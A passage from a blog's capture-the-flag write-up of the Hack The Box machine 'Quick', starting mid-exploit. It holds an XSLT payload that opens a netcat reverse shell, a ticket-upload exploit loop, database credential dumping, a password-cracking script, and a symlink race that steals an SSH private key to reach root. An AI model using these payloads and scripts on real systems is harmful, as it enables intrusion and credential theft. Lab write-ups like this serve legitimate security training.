&lt;xsl:variable name="rev" select="rt:exec(rt:getRuntime(), '/var/tmp/nc {} {} -e /bin/bash')"/&gt;
&lt;xsl:variable name="clean" select="rt:exec(rt:getRuntime(), 'rm -rf /var/tmp/nc')"/&gt;
&lt;xsl:value-of select="$perm" /&gt;
&lt;xsl:value-of select="$rev" /&gt;
&lt;xsl:value-of select="$clean" /&gt;
&lt;/xsl:template&gt;
&lt;/xsl:stylesheet&gt;
"""</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">up</span><span class="o">+</span><span class="s">"0"</span><span class="o">+</span><span class="n">ext</span><span class="p">,</span> <span class="s">"w+"</span><span class="p">)</span> <span class="k">as</span> <span class="n">upl</span><span class="p">:</span>
   <span class="n">upl</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">upload</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">myip</span><span class="p">))</span>
   <span class="n">upl</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">rev</span><span class="o">+</span><span class="s">"0"</span><span class="o">+</span><span class="n">ext</span><span class="p">,</span> <span class="s">"w+"</span><span class="p">)</span> <span class="k">as</span> <span class="n">revr</span><span class="p">:</span>
   <span class="n">revr</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">reverse</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">myip</span><span class="p">,</span><span class="n">myport</span><span class="p">))</span>
   <span class="n">revr</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>

<span class="n">cookie</span> <span class="o">=</span> <span class="n">login</span><span class="p">(</span><span class="n">username</span><span class="p">,</span><span class="n">passw</span><span class="p">)</span>

<span class="n">i</span> <span class="o">=</span> <span class="mi">0</span>
<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
  <span class="n">fn1</span> <span class="o">=</span> <span class="n">up</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
  <span class="n">fn2</span> <span class="o">=</span> <span class="n">rev</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span>
  <span class="k">print</span><span class="p">(</span><span class="s">"Sending Exploit 1"</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">"</span><span class="si">\</span><span class="se">r</span><span class="s">"</span><span class="p">)</span>
  <span class="n">response1</span> <span class="o">=</span> <span class="n">create_ticket</span><span class="p">(</span><span class="n">fn1</span><span class="p">,</span><span class="n">cookie</span><span class="p">)</span>
  <span class="k">print</span><span class="p">(</span><span class="s">"Sending Exploit 2"</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">"</span><span class="si">\</span><span class="se">r</span><span class="s">"</span><span class="p">)</span>
  <span class="n">response2</span> <span class="o">=</span> <span class="n">create_ticket</span><span class="p">(</span><span class="n">fn2</span><span class="p">,</span><span class="n">cookie</span><span class="p">)</span>
  <span class="n">os</span><span class="p">.</span><span class="n">rename</span><span class="p">(</span><span class="n">fn1</span><span class="o">+</span><span class="n">ext</span><span class="p">,</span> <span class="n">up</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">+</span><span class="n">ext</span><span class="p">)</span>
  <span class="n">os</span><span class="p">.</span><span class="n">rename</span><span class="p">(</span><span class="n">fn2</span><span class="o">+</span><span class="n">ext</span><span class="p">,</span> <span class="n">rev</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">)</span><span class="o">+</span><span class="n">ext</span><span class="p">)</span>
  <span class="n">i</span><span class="o">+=</span><span class="mi">1</span>
  <span class="k">if</span> <span class="s">"raised"</span> <span class="ow">in</span> <span class="n">response1</span><span class="p">.</span><span class="n">text</span> <span class="ow">and</span> <span class="s">"raised"</span> <span class="ow">in</span> <span class="n">response2</span><span class="p">.</span><span class="n">text</span><span class="p">:</span>
    <span class="n">os</span><span class="p">.</span><span class="n">rename</span><span class="p">(</span><span class="n">up</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span><span class="o">+</span><span class="n">ext</span><span class="p">,</span> <span class="n">up</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">+</span><span class="n">ext</span><span class="p">)</span>
    <span class="n">os</span><span class="p">.</span><span class="n">rename</span><span class="p">(</span><span class="n">rev</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="p">)</span><span class="o">+</span><span class="n">ext</span><span class="p">,</span> <span class="n">rev</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">+</span><span class="n">ext</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Triggering Exploit 1"</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">"</span><span class="si">\</span><span class="se">r</span><span class="s">"</span><span class="p">)</span>
    <span class="n">search</span><span class="p">(</span><span class="n">up</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="n">cookie</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Exploit 1, Success"</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Triggering Exploit 2"</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="s">"</span><span class="si">\</span><span class="se">r</span><span class="s">"</span><span class="p">)</span>
    <span class="n">search</span><span class="p">(</span><span class="n">rev</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">),</span> <span class="n">cookie</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Exploit 2, Success"</span><span class="p">)</span>
    <span class="n">proc</span><span class="p">.</span><span class="n">kill</span><span class="p">()</span>
    <span class="n">os</span><span class="p">.</span><span class="n">remove</span><span class="p">(</span><span class="n">up</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">+</span><span class="n">ext</span><span class="p">)</span>
    <span class="n">os</span><span class="p">.</span><span class="n">remove</span><span class="p">(</span><span class="n">rev</span><span class="o">+</span><span class="nb">str</span><span class="p">(</span><span class="n">i</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">+</span><span class="n">ext</span><span class="p">)</span>
    <span class="n">nc_cmd</span> <span class="o">=</span> <span class="s">'kitty nc -lnvp {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">myport</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"Launching netcat with IP: {} Port: {}. Will take 10s to get connection"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">myip</span><span class="p">,</span><span class="n">myport</span><span class="p">))</span>
    <span class="n">shell</span> <span class="o">=</span> <span class="n">subprocess</span><span class="p">.</span><span class="n">run</span><span class="p">(</span><span class="n">nc_cmd</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">text</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">capture_output</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
    <span class="k">break</span>
</pre></table></code></div></div><h3 id="enum">Enum</h3><h4 id="home-dir">Home dir</h4><p>Get user dir. Only 2 in home dir:</p><ol><li>sam</li><li>srvadm</li></ol><p><img src="/img/Quick/2020-05-02-15-32-21.png" alt="" /></p><p>So far nothing interesting in sam dir. Since I got the shell from the website, I just head over to web home dir /var/www/</p><h4 id="varwww">/var/www/</h4><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre><td class="rouge-code"><pre>sam@quick:/var/www$ ls -la
total 20
drwxr-xr-x  5 root root 4096 Mar 21 03:07 .
drwxr-xr-x 14 root root 4096 Mar 20 02:10 ..
drwxr-xr-x  2 root root 4096 Mar 20 03:48 html
drwxrwxrwx  2 root root 4096 Mar 21 03:11 jobs
drwxr-xr-x  6 root root 4096 Mar 21 03:08 printer
sam@quick:/var/www$ 
</pre></table></code></div></div><h4 id="varwwwhtml">/var/www/html</h4><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre>sam@quick:/var/www/html$ ls -la
total 52
drwxr-xr-x 2 root root 4096 Mar 20 03:48 .
drwxr-xr-x 5 root root 4096 Mar 21 03:07 ..
-rw-r--r-- 1 root root 2698 Mar 17 07:16 clients.php
-rw-r--r-- 1 root root   69 Mar 17 07:57 db.php
-rw-r--r-- 1 root root 9549 Mar 18 04:07 home.php
-rw-r--r-- 1 root root 3362 Mar 20 03:48 index.php
-rw-r--r-- 1 root root 5013 Mar 18 04:42 login.php
-rw-r--r-- 1 root root 1247 Mar 18 04:52 search.php
-rw-r--r-- 1 root root 7307 Mar 18 04:55 ticket.php
sam@quick:/var/www/html$
</pre></table></code></div></div><p>Got db.php. Read through it, got mysql cred.</p><div class="language-console highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="gp">sam@quick:/var/www/html$</span><span class="w"> </span><span class="nb">cat </span>db.php 
<span class="go">&lt;?php 
</span><span class="gp">$</span>conn <span class="o">=</span> new mysqli<span class="o">(</span><span class="s2">"localhost"</span>,<span class="s2">"db_adm"</span>,<span class="s2">"db_p4ss"</span>,<span class="s2">"quick"</span><span class="o">)</span><span class="p">;</span>
<span class="gp">?&gt;</span><span class="w">
</span><span class="gp">sam@quick:/var/www/html$</span><span class="w">
</span></pre></table></code></div></div><p>Dump the db. Might get useful cred there. Yeah, got 2 pairs of cred in there. 1 belongs to elisa and another one to srvadm, but its hashed. srvadm is the valid user in this machine, just grab it to crack.</p><p><code class="highlighter-rouge">mysqldump -udb_adm -pdb_p4ss quick</code></p><p><img src="/img/Quick/2020-05-02-01-03-00.png" alt="" /></p><h3 id="crack-the-hash">Crack the hash</h3><p>since it in md5 format, I tried an online solution, but no result. This must be salted pass with some encryption. Must be coded somewhere. Look again through /var/www/printer</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>sam@quick:/var/www/printer$ ls
add_printer.php  css  db.php  escpos-php  favicon.ico  fonts  home.php  images  index.php  job.php  printers.php
sam@quick:/var/www/printer$
</pre></table></code></div></div><p>another db.php. It’s same as in html dir. Dumping it gave me same content as in html dir.</p><p>After checking files in printer dir, found how the pass was encrypted in index.php file</p><div class="language-php highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre><td class="rouge-code"><pre><span class="cp">&lt;?php</span>
<span class="k">include</span><span class="p">(</span><span class="s2">"db.php"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nb">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"email"</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="nb">isset</span><span class="p">(</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"password"</span><span class="p">]))</span>
<span class="p">{</span>
        <span class="nv">$email</span><span class="o">=</span><span class="nv">$_POST</span><span class="p">[</span><span class="s2">"email"</span><span class="p">];</span>
        <span class="nv">$password</span> <span class="o">=</span> <span class="nv">$_POST</span><span class="p">[</span><span class="s2">"password"</span><span class="p">];</span>
        <span class="nv">$password</span> <span class="o">=</span> <span class="nb">md5</span><span class="p">(</span><span class="nb">crypt</span><span class="p">(</span><span class="nv">$password</span><span class="p">,</span><span class="s1">'fa'</span><span class="p">));</span>
        <span class="nv">$stmt</span><span class="o">=</span><span class="nv">$conn</span><span class="o">-&gt;</span><span class="na">prepare</span><span class="p">(</span><span class="s2">"select email,password from users where email=? and password=?"</span><span class="p">);</span>
        <span class="nv">$stmt</span><span class="o">-&gt;</span><span class="na">bind_param</span><span class="p">(</span><span class="s2">"ss"</span><span class="p">,</span><span class="nv">$email</span><span class="p">,</span><span class="nv">$password</span><span class="p">);</span>
        <span class="nv">$stmt</span><span class="o">-&gt;</span><span class="na">execute</span><span class="p">();</span>
        <span class="nv">$result</span> <span class="o">=</span> <span class="nv">$stmt</span><span class="o">-&gt;</span><span class="na">get_result</span><span class="p">();</span>
        <span class="nv">$num_rows</span> <span class="o">=</span> <span class="nv">$result</span><span class="o">-&gt;</span><span class="na">num_rows</span><span class="p">;</span>
        <span class="k">if</span><span class="p">(</span><span class="nv">$num_rows</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="nv">$email</span> <span class="o">===</span> <span class="s2">"srvadm@quick.htb"</span><span class="p">)</span>
        <span class="p">{</span>
                <span class="nb">session_start</span><span class="p">();</span>
                <span class="nv">$_SESSION</span><span class="p">[</span><span class="s2">"loggedin"</span><span class="p">]</span><span class="o">=</span><span class="nv">$email</span><span class="p">;</span>
                <span class="nb">header</span><span class="p">(</span><span class="s2">"location: home.php"</span><span class="p">);</span>
        <span class="p">}</span>
        <span class="k">else</span>
        <span class="p">{</span>
                <span class="k">echo</span> <span class="s1">'&lt;script&gt;alert("Invalid Credentials");window.location.href="/index.php";&lt;/script&gt;'</span><span class="p">;</span>
        <span class="p">}</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="o">----</span> <span class="nx">snip</span> <span class="o">----</span>
</pre></table></code></div></div><p><code class="highlighter-rouge">$password = md5(crypt($password,'fa'));</code> this line tells how the pass was encrypted.</p><p>From it, now I know the pass encrypted with crypt function and salted with string <code class="highlighter-rouge">fa</code>. Then hashed using md5 function. Lets make simple cracker for this. I’ll go with python.</p><p>With what I have, the srvadm hashed pass <code class="highlighter-rouge">e626d51f8fbfd1124fdea88396c35d05</code>, I just need to get any plain text, encrypt it with salted string <code class="highlighter-rouge">fa</code> then hash it with md5, then compare the value with srvadm hash. It just wordlist attack. Here my code:</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre><span class="kn">import</span> <span class="nn">hashlib</span><span class="p">,</span> <span class="n">crypt</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">"/usr/share/wordlists/seclists-git/Passwords/Leaked-Databases/rockyou.txt"</span><span class="p">,</span> <span class="s">"r"</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s">"ISO-8859-1"</span><span class="p">)</span> <span class="k">as</span> <span class="n">passwd</span><span class="p">:</span>
<span class="c1">#with open("test", "r") as a_file:
</span>  <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">passwd</span><span class="p">:</span>
    <span class="n">plain</span> <span class="o">=</span> <span class="n">line</span><span class="p">.</span><span class="n">rstrip</span><span class="p">()</span>
    <span class="n">crypted</span> <span class="o">=</span> <span class="n">crypt</span><span class="p">.</span><span class="n">crypt</span><span class="p">(</span><span class="n">plain</span><span class="p">,</span> <span class="s">'fa'</span><span class="p">)</span>
    <span class="n">hashes</span> <span class="o">=</span> <span class="n">hashlib</span><span class="p">.</span><span class="n">md5</span><span class="p">(</span><span class="n">crypted</span><span class="p">.</span><span class="n">encode</span><span class="p">()).</span><span class="n">hexdigest</span><span class="p">()</span>
    <span class="k">print</span><span class="p">(</span><span class="n">crypted</span><span class="p">,</span> <span class="n">plain</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">hashes</span> <span class="o">==</span> <span class="s">'e626d51f8fbfd1124fdea88396c35d05'</span><span class="p">:</span>
       <span class="k">print</span><span class="p">(</span><span class="s">'pass found:'</span><span class="p">,</span> <span class="n">plain</span><span class="p">)</span>
       <span class="k">break</span>
    <span class="k">else</span><span class="p">:</span>
       <span class="k">continue</span>
</pre></table></code></div></div><p><strong><em>NOTE: I used ISO-8859-1 encoding due to some error I when run it for first time with utf-8 encoding.</em></strong></p><p>Run my script with rockyou as dict.</p><p><img src="/img/Quick/2020-05-02-03-24-10.png" alt="" /></p><p>Found the pass under 3 minutes. pass: <code class="highlighter-rouge">yl51pbx</code></p><h3 id="vhosts">Vhosts</h3><p>With that pass, I tried su srvadm, but failed. Means this just valid for printer page somewhere hosted in this machine. Gotta find it.</p><p>Knowing that previous site using apache, I’ll cd straight to where common conf for apache, /etc/apache2.</p><p>Look for the conf for vhosts</p><p><strong>000-default.conf</strong></p><p><img src="/img/Quick/2020-05-02-16-07-32.png" alt="" /></p><p>Got another vhosts to check. <code class="highlighter-rouge">printerv2.quick.htb</code></p><h3 id="printerv2">Printerv2</h3><p>When visiting <a href="http://printerv2.quick.htb">http://printerv2.quick.htb</a>, kept getting this error, <code class="highlighter-rouge">error retrieving URL</code></p><p><img src="/img/Quick/2020-05-02-16-12-41.png" alt="" />.</p><p>Tired getting this error everytime, I tried access it from the host itself, but failed. Maybe just forward the port.</p><p>With generated key earlier to access sam, I used ssh to do port forwarding.</p><p><img src="/img/Quick/2020-05-02-16-19-58.png" alt="" /></p><p>Lets try access it again. <strong><em>NOTE: after PF, it should accessible from the localhost on port 9001. Add in hosts 127.0.0.1 point to printerv2.quick.htb</em></strong></p><p><img src="/img/Quick/2020-05-02-16-24-00.png" alt="" /></p><p>Login with email <code class="highlighter-rouge">srvadm@quick.htb</code> and cracked pass <code class="highlighter-rouge">yl51pbx</code>, I managed to get through it.</p><p><img src="/img/Quick/2020-05-02-03-24-42.png" alt="" /></p><p>playing with the system to get to know what it does, here the summary:</p><ol><li>Add my IP and port to be accessible as printer</li><li>add job and submit, it will print what the description I put inside it.</li></ol><p><img src="/img/Quick/2020-05-02-16-32-13.png" alt="" /></p><p>CLick the printer icon to add the job</p><p><img src="/img/Quick/2020-05-02-16-33-34.png" alt="" /></p><p>And it failed because I’m not open the port yet.</p><p><img src="/img/Quick/2020-05-02-16-34-21.png" alt="" /></p><p>Opened the port, it allows me to add the job</p><p><img src="/img/Quick/2020-05-02-16-35-48.png" alt="" /></p><p>Click it to add job, and put anything in the input field after that</p><p><img src="/img/Quick/2020-05-02-16-37-12.png" alt="" /></p><p>Click print, It then tells “Job assigned”. Look again to my listener, got the exact message like I wrote</p><p><img src="/img/Quick/2020-05-02-16-38-40.png" alt="" /></p><p>Interesting.</p><h3 id="job-task">Job task</h3><p>Take a deeper look in the file inside printer dir, look at the job.php file, it getting more interesting</p><p><img src="/img/Quick/2020-05-02-16-42-17.png" alt="" /></p><ol><li>It takes what I wrote and put it in the file created with date format and grant the file with all permission.</li><li>Get the content in the /var/www/jobs dir with date format file.</li></ol><p>Knowing the flow, checking who owns that php file, it owned by root!! I can take advantage of this flow. How about grab root private key, and put it there, change filename as date format too.</p><p><strong><em>Note:I’ve failed all the time to get root key, I’m assuming root user didn’t have the key inside .ssh dir. I’m proceed with srvadm key.</em></strong></p><p>But to be able to do that, I need to know the exact file name created from the printer page site. In fact, after content get printed, the file will be deleted. With all this in consideration, the only solution is to make a script.</p><h3 id="symlinker-script">Symlinker script</h3><p>I’m thinking of using symlink to link servadm priv key to jobs dir. I did with python. Here the script:</p><div class="language-python highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre><span class="kn">from</span> <span class="nn">subprocess</span> <span class="kn">import</span> <span class="n">check_output</span>
<span class="kn">import</span> <span class="nn">datetime</span>
<span class="kn">import</span> <span class="nn">os</span>

<span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
    <span class="n">ff</span> <span class="o">=</span> <span class="n">datetime</span><span class="p">.</span><span class="n">datetime</span><span class="p">.</span><span class="n">now</span><span class="p">().</span><span class="n">strftime</span><span class="p">(</span><span class="s">"%Y-%m-%d_%H:%M:%S"</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">os</span><span class="p">.</span><span class="n">path</span><span class="p">.</span><span class="n">exists</span><span class="p">(</span><span class="s">"/var/www/jobs/"</span><span class="o">+</span><span class="n">ff</span><span class="p">):</span>
        <span class="n">check_output</span><span class="p">(</span><span class="s">"rm -rf /var/www/jobs/"</span><span class="o">+</span><span class="n">ff</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
        <span class="n">grab</span> <span class="o">=</span> <span class="n">check_output</span><span class="p">([</span><span class="s">"ln"</span><span class="p">,</span><span class="s">"-s"</span><span class="p">,</span> <span class="s">"/home/srvadm/.ssh/id_rsa"</span><span class="p">,</span> <span class="n">ff</span><span class="p">],</span> <span class="n">cwd</span><span class="o">=</span><span class="s">"/var/www/jobs/"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="n">grab</span><span class="p">)</span>
        <span class="k">break</span>        
</pre></table></code></div></div><p>What it does was check every seconds, if jobs dir have any file with the particular name with date format, it removes the original file and symlink srvadm priv key to job dir with the deleted file name. When I hit print in the website page, the content of the priv key will be sent to my ‘<em>printer</em>’</p><p>Run my script, and go back to the webpage. Repeat the process to add the job. I’m not putting anything in the input field, just hit print, and my listener got the key instantly. Nice!</p><p><img src="/img/Quick/2020-05-02-18-59-06.png" alt="" /></p><h3 id="ssh-as-srvadm">SSH as srvadm</h3><p>With that priv key, just log in via ssh. It won’t ask for the password or passphrase.</p><p><img src="/img/Quick/2020-05-02-04-38-59.png" alt="" /></p><p>At this stage, I’m a bit lost for a while. There was nothing inside srvadm home dir. The hidden dir is the common dir, so I begin to look each dirs and files. One of the files inside <em>.cache</em> dir caught my attention. I stopped at the line which looks like URL, but with credential-like string. <code class="highlighter-rouge">%26ftQ4K3SGde8%3F</code></p><p><img src="/img/Quick/2020-05-02-12-11-25.png" alt="" /></p><p>Looks like url encoded format at the beginning and the end of the string. Decoded it, now it turned tp <code class="highlighter-rouge">&amp;ftQ4K3SGde8?</code>. Let try <code class="highlighter-rouge">su root</code> with it.</p><p><img src="/img/Quick/2020-05-02-12-13-14.png" alt="" /></p><p>Hoyeah, I’m root!! With this password, I should be able to ssh with it.</p><h2 id="victory">Victory</h2><p><img src="/img/Quick/2020-05-02-12-21-10.png" alt="" /></p><p><img src="/img/Quick/2020-05-03-02-41-01.png" alt="" /></p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/machine/'>machine</a>, <a href='/categories/writeup/'>writeup</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/htb/" class="post-tag no-text-decoration" >htb</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><!-- Post sharing snippet v2.1 https://github.com/zeroryuki/ © 2019 zRyuki Published under the MIT License --><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hack The Box Write Up - Quick - zRyuki&url=https://zeroryuki.github.io/posts/quick/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hack The Box Write Up - Quick - zRyuki&u=https://zeroryuki.github.io/posts/quick/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Hack The Box Write Up - Quick - zRyuki&url=https://zeroryuki.github.io/posts/quick/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><!-- The Pannel on right side (Desktop views) v2.0 https://github.com/zeroryuki/ © 2017-2019 zRyuki MIT License --><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-tags"><h3 data-toc-skip>Trending Tags</h3><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <!-- The trending tags list v2.0 https://github.com/zeroryuki/ © 2019 zRyuki MIT Licensed --> <a class="post-tag" href="/tags/htb/">htb</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><h3 data-toc-skip class="pl-3 pt-2 mb-3">Contents</h3><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="post-extend-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"> <!-- Navigation buttons at the bottom of the post. v2.1 https://github.com/zeroryuki/ © 2020 zRyuki MIT License --><div class="post-navigation d-flex justify-content-between"> <a href="/posts/magic/" class="btn btn-outline-primary"><p>Hack The Box Write Up - Magic</p></a> <a href="/posts/obscurity/" class="btn btn-outline-primary"><p>HTB Obscurity Writeup</p></a></div><!-- The Disqus lazy loading. Powered by: https://osvaldas.info/lazy-loading-disqus-comments v2.0 https://github.com/zeroryuki/ © 2019 zRyuki MIT License --><div id="disqus_thread" class="pt-2 pb-4"><p class="font-italic text-muted small">Comments powered by <a href="https://disqus.com/">Disqus</a>.</p></div><script type="text/javascript"> /* * * CONFIGURATION VARIABLES * * */ var disqus_shortname = "zryuki-space"; var disqus_identifier = "/posts/quick"; var disqus_url = "https://zeroryuki.github.io/posts/quick/"; if (document.getElementById('disqus_thread')) { var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true; dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js'; (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq); } </script> <!-- The related posts of current post. Placed in the bottom of every single post. v2.0 https://github.com/zeroryuki/ © 2019 zRyuki Published under the MIT License --><div id="related-posts" class="mt-4 mb-2 mb-sm-4 pb-2"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Registry/"><div class="card-body"> <span class="timeago small"> Apr 5, 2020 <i class="unloaded">2020-04-05T00:00:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box Write Up - Registry</h3><div class="text-muted small"><p>Information Gathering Nmap We begin our reconnaissance by running an Nmap scan checking default scripts and testing for vulnerabilities. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ...</p></div></div></a></div><div class="card"> <a href="/posts/Traverxec/"><div class="card-body"> <span class="timeago small"> Apr 9, 2020 <i class="unloaded">2020-04-09T00:00:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box Write Up - Traverxec</h3><div class="text-muted small"><p>Information Gathering As usual, i start my recon with nmap. Nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 # Nmap 7.80SVN scan initiated Thu Dec 5 21:18:15 2019 as: nm...</p></div></div></a></div><div class="card"> <a href="/posts/mango/"><div class="card-body"> <span class="timeago small"> Apr 17, 2020 <i class="unloaded">2020-04-17T21:34:29+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box Write Up - Mango</h3><div class="text-muted small"><p>Info Gathering Nmap 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 6...</p></div></div></a></div></div></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const el = document.querySelectorAll('#post-wrapper img'); const observer = lozad(el); observer.observe(); </script> <!-- The Footer v2.0 https://github.com/zeroryuki/ © 2017-2019 zRyuki MIT License --><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://twitter.com/username">zRyuki</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div></div></footer></div><!-- The Search results v2.0 https://github.com/zeroryuki/ © 2017-2019 zRyuki MIT License --><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted">Trending Tags</h4><!-- The trending tags list v2.0 https://github.com/zeroryuki/ © 2019 zRyuki MIT Licensed --> <a class="post-tag" href="/tags/htb/">htb</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <!-- Jekyll Simple Search loader v2.0 https://github.com/zeroryuki/ © 2017-2019 zRyuki MIT License --> <script 